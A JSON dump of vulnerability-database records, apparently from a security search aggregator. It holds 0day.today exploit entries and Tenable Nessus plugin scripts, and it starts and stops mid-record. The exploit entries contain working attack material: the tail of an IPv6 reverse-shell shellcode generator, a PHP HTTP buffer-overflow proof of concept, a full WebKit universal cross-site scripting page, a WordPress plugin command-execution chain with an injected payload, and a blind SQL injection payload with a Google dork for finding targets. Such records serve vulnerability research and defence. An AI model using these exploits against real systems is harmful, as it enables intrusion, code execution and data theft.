fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509)')\r\n parser.add_argument('port', type=int, nargs='?', default=1337,\r\n help='The port to connect to (default 1337)')\r\n args = parser.parse_args()\r\n \r\n ip = ip_address(args.ip_address)\r\n ip_hex = ip.exploded\r\n \r\n if args.port < 1 or args.port > 65535:\r\n print('Invalid port. Please select a port between 1 and 65535')\r\n sys.exit(1)\r\n \r\n port = format(args.port, '04x')\r\n port = \"\\\\x{b}\\\\x{a}\".format(\r\n a=port[2:4],\r\n b=port[0:2]) \r\n \r\n split_hex_ip = ip_hex.split(':')\r\n ipv6_fourth_octet = '\\\\x{d}\\\\x{c}\\\\x{b}\\\\x{a}'.format(\r\n d=split_hex_ip[6][0:2],\r\n c=split_hex_ip[6][2:4],\r\n b=split_hex_ip[7][0:2],\r\n a=split_hex_ip[7][2:4])\r\n ipv6_third_octet = '\\\\x{d}\\\\x{c}\\\\x{b}\\\\x{a}'.format(\r\n d=split_hex_ip[4][0:2],\r\n c=split_hex_ip[4][2:4],\r\n b=split_hex_ip[5][0:2],\r\n a=split_hex_ip[5][2:4])\r\n ipv6_second_octet = '\\\\x{d}\\\\x{c}\\\\x{b}\\\\x{a}'.format(\r\n d=split_hex_ip[2][0:2],\r\n c=split_hex_ip[2][2:4],\r\n b=split_hex_ip[3][0:2],\r\n a=split_hex_ip[3][2:4])\r\n ipv6_first_octet = '\\\\x{d}\\\\x{c}\\\\x{b}\\\\x{a}'.format(\r\n d=split_hex_ip[0][0:2],\r\n c=split_hex_ip[0][2:4],\r\n b=split_hex_ip[1][0:2],\r\n a=split_hex_ip[1][2:4])\r\n \r\n if '\\\\x00' in port:\r\n print('[!] Warning: The port you chose contains a null value.')\r\n if (('\\\\x00' in ipv6_fourth_octet) or ('\\\\x00' in ipv6_third_octet) or\r\n ('\\\\x00' in ipv6_second_octet) or ('\\\\x00' in ipv6_first_octet)):\r\n print('[!] Warning: The IP address you chose contains a null value.')\r\n \r\n print('Shellcode:')\r\n print(sc.format(\r\n ipv6_first_octet=str(ipv6_first_octet),\r\n ipv6_second_octet=str(ipv6_second_octet),\r\n ipv6_third_octet=str(ipv6_third_octet),\r\n ipv6_fourth_octet=str(ipv6_fourth_octet),\r\n port=str(port)))\n\n# 0day.today [2018-09-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31003"}, {"lastseen": "2018-06-06T21:48:51", "bulletinFamily": "exploit", "description": "Exploit for php platform in category dos / poc", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "1337DAY-ID-30541", "href": "https://0day.today/exploit/description/30541", "title": "PHP 7.2.2 - php_stream_url_wrap_http_ex Buffer Overflow Exploit", "type": "zdt", "sourceData": "Description:\r\n------------\r\nThe latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at:\r\n \r\nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n \r\n if (tmp_line[tmp_line_len - 1] == '\\n') {\r\n --tmp_line_len;\r\n if (tmp_line[tmp_line_len - 1] == '\\r') {\r\n --tmp_line_len;\r\n }\r\n}\r\n \r\nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed.\r\n \r\n$ bin/php --version\r\nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )\r\nCopyright (c) 1997-2018 The PHP Group\r\nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies\r\n \r\n \r\nTest script:\r\n---------------\r\n$ xxd -g 1 poc\r\n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..\r\n \r\n$ nc -vvlp 8080 < poc\r\nListening on [0.0.0.0] (family 0, port 8080)\r\nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)\r\nGET / HTTP/1.0\r\nHost: localhost:8080\r\nConnection: close\r\n \r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n \r\nExpected result:\r\n----------------\r\nNO CRASH\r\n \r\nActual result:\r\n--------------\r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n=================================================================\r\n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac\r\nREAD of size 1 at 0xbfc038ef thread T0\r\n #0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n #1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979\r\n #2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027\r\n #3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550\r\n #4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224\r\n #5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573\r\n #6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731\r\n #7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760\r\n #8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082\r\n #9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123\r\n #10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134\r\n #11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042\r\n #12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404\r\n #13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)\r\n #14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)\r\nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack:\r\n This frame has 13 object(s):\r\n [32, 36) 'transport_string'\r\n [96, 100) 'errstr'\r\n [160, 164) 'http_header_line_length'\r\n [224, 232) 'timeout'\r\n [288, 296) 'req_buf'\r\n [352, 360) 'tmpstr'\r\n [416, 432) 'ssl_proxy_peer_name'\r\n [480, 496) 'http_header'\r\n [544, 576) 'buf'\r\n [608, 736) 'tmp_line'\r\n [768, 1792) 'location'\r\n [1824, 2848) 'new_path'\r\n [2880, 3904) 'loc_path'\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex\r\nShadow bytes around the buggy address:\r\n 0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4\r\n 0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00\r\n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00\r\n 0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2\r\n 0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap righ redzone: fb\r\n Freed Heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==26249== ABORTING\r\nAborted\n\n# 0day.today [2018-06-06] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/30541"}, {"lastseen": "2018-04-12T21:51:37", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2017-05-25T00:00:00", "published": "2017-05-25T00:00:00", "href": "https://0day.today/exploit/description/27847", "id": "1337DAY-ID-27847", "type": "zdt", "title": "WebKit - ContainerNode::parserRemoveChild Universal Cross-Site Scripting Exploit", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1134\r\n \r\nHere's a snippet of ContainerNode::parserRemoveChild.\r\n \r\nvoid ContainerNode::parserRemoveChild(Node& oldChild)\r\n{\r\n disconnectSubframesIfNeeded(*this, DescendantsOnly); <<---- (a)\r\n ...\r\n document().notifyRemovePendingSheetIfNeeded(); <<---- (b)\r\n}\r\n \r\nsubframes are detached at (a). But In |notifyRemovePendingSheetIfNeeded| at (b), which fires a focus event, we can attach subframes again.\r\n \r\nPoC:\r\n-->\r\n \r\n<html>\r\n<head>\r\n</head>\r\n<body>\r\n<script>\r\n \r\nlet xml = `\r\n<body>\r\n <div>\r\n <b>\r\n <p>\r\n <script>\r\n let p = document.querySelector('p');\r\n let link = p.appendChild(document.createElement('link'));\r\n link.rel = 'stylesheet';\r\n link.href = 'data:,aaaaazxczxczzxzcz';\r\n \r\n let btn = document.body.appendChild(document.createElement('button'));\r\n btn.id = 'btn';\r\n btn.onfocus = () => {\r\n btn.onfocus = null;\r\n \r\n window.d = document.querySelector('div');\r\n window.d.remove();\r\n \r\n link.remove();\r\n document.body.appendChild(p);\r\n \r\n let m = p.appendChild(document.createElement('iframe'));\r\n setTimeout(() => {\r\n document.documentElement.innerHTML = '';\r\n \r\n m.onload = () => {\r\n m.onload = null;\r\n \r\n m.src = 'javascript:alert(location);';\r\n var xml = \\`\r\n<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n<script>\r\ndocument.documentElement.appendChild(parent.d);\r\n</sc\\` + \\`ript>\r\n<element a=\"1\" a=\"2\" />\r\n</svg>\\`;\r\n \r\n var tmp = document.documentElement.appendChild(document.createElement('iframe'));\r\n tmp.src = URL.createObjectURL(new Blob([xml], {type: 'text/xml'}));\r\n };\r\n m.src = 'https://abc.xyz/';\r\n }, 0);\r\n };\r\n \r\n location.hash = 'btn';\r\n </scrip` + `t>\r\n </b>\r\n </p>\r\n </div>\r\n</body>`;\r\n \r\nlet tf = document.body.appendChild(document.createElement('iframe'));\r\ntf.src = URL.createObjectURL(new Blob([xml], {type: 'text/html'}));\r\n \r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-04-12] #", "sourceHref": "https://0day.today/exploit/27847", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-11T11:51:07", "bulletinFamily": "exploit", "description": "WordPress Xloner plugin version 3.1.2 suffers from command execution and cross site scripting vulnerabilities.", "modified": "2015-06-03T00:00:00", "published": "2015-06-03T00:00:00", "id": "1337DAY-ID-23696", "href": "https://0day.today/exploit/description/23696", "type": "zdt", "title": "WordPress Xloner 3.1.2 XSS / Command Execution Vulnerabilities", "sourceData": "Title: Xloner v3.1.2 wordpress plugin authenticated command execution and XSS\r\nAuthor: Larry W. Cashdollar, @_larry0\r\nDate: 2015-05-10\r\nDownload Site: https://wordpress.org/plugins/xclonerbackupandrestore/ http://extensions.joomla.org/extensions/accessasecurity/ sitesecurity/ backup/665\r\nVendor: Ovidiu Liuta, @thinkovi\r\nVendor Notified: 0000-00-00\r\nVendor Contact: @thinkovi\r\nDescription: XCloner is a Backup and Restore component designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!\r\nVulnerability:\r\nLines 1129 of 1135 in cloner.functions.php\r\n\r\n1129 $excluded_cmd = \"\";\r\n1130 if ($fp = @fopen($_REQUEST['\r\n1130 if ($fp = @fopen($_REQUEST['excl_manual'], \"r\")) {\r\n1131 while (!feof($fp))\r\n1132 $excluded_cmd .= fread($fp, 1024);\r\n1133\r\n1134 fclose($fp);\r\n1135 }\r\n\r\nLine 1205:\r\nIf configured for manual mode the contents of $excluded_cmd are passed to exec();\r\n1205 exec($_CONFIG[tarpath] . \" $excluded_cmd \". $_CONFIG['tarcompress'] .\"vf $backup_file update $file\");\r\nWe need to supply a file with a list of commands to execute in it, we can create this via the backup comments feature. It creates a file under administrator/backups/.comments with whatever you want in it. Like ;id>/tmp/w00t;\r\n\r\nThen change the configuration to manual backup by selecting the radio button and perform a backup.\r\nHit this link:\r\nhttp://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_cloner&task=refresh&json=0&startf=300&lines=6204&backup=backup_20150511_\r\n2028_sqlnodrop.tar&excl_manual=/usr/share/wordpress/administrator/backups/.comments\r\n\r\nIn a shell:\r\n$ cat /tmp/w00t\r\nuid=33(wwwdata)\r\ngid=33(wwwdata)\r\ngroups=33(wwwdata)\r\n\r\nAlso $excluded_cmd is XSS\r\n\r\nhttp://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_cloner&task=refresh&json=0&startf=800&lines=6204&backup=backup_20150511_\r\n2028_sqlnodrop.tar&excl_manual=\u2019><script>alert(\u2018w00t\u2019);</script>\r\n\r\nChrome XSS alert:\r\n\r\nThe XSS Auditor refused to execute a script in\r\n'http://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_\u2026lnodrop.tar&excl_manual=%27%3E%3Cscript%3Ealert(%27w00t%27);%3C/script%3E' because\r\nits source code was found within the request. The auditor was enabled as the server sent\r\nneither an 'XXSSProtection' nor 'ContentSecurityPolicy' header.\r\nplugins.php:403 The XSS Auditor refused to execute a script in\r\n'http://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_\u2026lno\r\ndrop.tar&excl_manual=%27%3E%3Cscript%3Ealert(%27w00t%27);%3C/script%3E' because\r\nits source code was found within the request. The auditor was enabled as the server sent\r\nneither an 'XXSSProtection' nor 'ContentSecurityPolicy' header.\r\n\r\nThe default template has an error with the LM_LOGIN_TEXT field so just clean that out or you\u2019ll get a syntax error when trying to execute.\r\nAdding foo\u201d);phpinfo();define(\u201cfoo to the Translation LM_FRONT_* fields then browsing to language/italian.php you\u2019ll execute phpinfo();.\n\n# 0day.today [2018-04-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/23696"}, {"lastseen": "2018-02-05T03:16:42", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2015-04-09T00:00:00", "published": "2015-04-09T00:00:00", "id": "1337DAY-ID-23495", "href": "https://0day.today/exploit/description/23495", "type": "zdt", "title": "WordPress SP Project & Document Manager 2.5.3 - Blind SQL Injection Vulnerability", "sourceData": "# Exploit Title: WordPress SP Project & Document Manager 2.5.3 Blind SQL Injection\r\n# Google Dork: inurl:wp-content/plugins/sp-client-document-manager\r\n# Date: 2015-03-04\r\n# Exploit Author: catsecurity\r\n# Vendor Homepage: http://smartypantsplugins.com\r\n# Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.2.5.3.zip\r\n# Version: version 2.5.3 and previous version\r\n# Tested on: Chrome (It's PHP Application)\r\n# CVE : N/A\r\n \r\n \r\n# Timeline #\r\n[2015.03.05] Reported to the Vendor\r\n[2015.03.06?] Fixed in Update 2.5.4\r\n \r\n \r\n# Details #\r\n \r\n- This vulnerability did not process integer parameters. Unauthorized users can attact the webstites that use this plugin.\r\n- Vulnerability code in the thumbnails() function which exists in the [ /wp-content/plugins/sp-client-document-manager/ajax.php ].\r\n- \"pid\" variable is not sanitized\r\n \r\n \r\n# Vulnerable code #\r\n \r\nLine 1132: echo '<div id=\"dlg_cdm_thumbnails\">';\r\nLine 1133: if ($_GET['pid'] != \"\") {\r\nLine 1134: $r_current_project = $wpdb->get_results(\"SELECT * FROM \" . $wpdb->prefix . \"sp_cu_project WHERE id = \" . $_GET['pid'] . \"\", ARRAY_A);\r\nLine 1135: }\r\n \r\n \r\n# POC #\r\n/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=[SQLi]\r\n \r\nexample:\r\n/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=if(substr(database(),1,1)=0x61,sleep(5),1)\r\n \r\nif yes it will sleep 5 seconds.\r\n \r\n \r\nThis vulnerable parameters must trance to integer\n\n# 0day.today [2018-02-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/23495"}], "nessus": [{"lastseen": "2019-11-01T02:35:08", "bulletinFamily": "scanner", "description": "Update to 1.0.7\n\nFixes related to CVE-2019-5736.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2019-A5F616808E.NASL", "href": "https://www.tenable.com/plugins/nessus/122523", "published": "2019-03-01T00:00:00", "title": "Fedora 28 : flatpak (2019-a5f616808e)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-a5f616808e.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122523);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/09/23 11:21:11\");\n\n script_cve_id(\"CVE-2019-5736\", \"CVE-2019-8308\");\n script_xref(name:\"FEDORA\", value:\"2019-a5f616808e\");\n\n script_name(english:\"Fedora 28 : flatpak (2019-a5f616808e)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 1.0.7\n\nFixes related to CVE-2019-5736.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-a5f616808e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flatpak package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:flatpak\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"flatpak-1.0.7-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flatpak\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:19:02", "bulletinFamily": "scanner", "description": "This update for libICE fixes the following issues :\n\n - CVE-2017-2626: Creation of the ICE auth session cookies\n used insufficient randomness, making these cookies\n predictable. A more random generation method has been\n implemented. (boo#1025068)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2017-1835-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101390", "published": "2017-07-12T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : libICE (SUSE-SU-2017:1835-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1835-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101390);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/09/11 11:22:15\");\n\n script_cve_id(\"CVE-2017-2626\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : libICE (SUSE-SU-2017:1835-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libICE fixes the following issues :\n\n - CVE-2017-2626: Creation of the ICE auth session cookies\n used insufficient randomness, making these cookies\n predictable. A more random generation method has been\n implemented. (boo#1025068)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025068\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2626/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171835-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?77b78e34\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-1134=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-1134=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-1134=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-1134=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libICE-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libICE6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libICE6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE-debugsource-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE6-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE6-debuginfo-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE6-32bit-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE6-debuginfo-32bit-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE-debugsource-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE6-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE6-32bit-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", 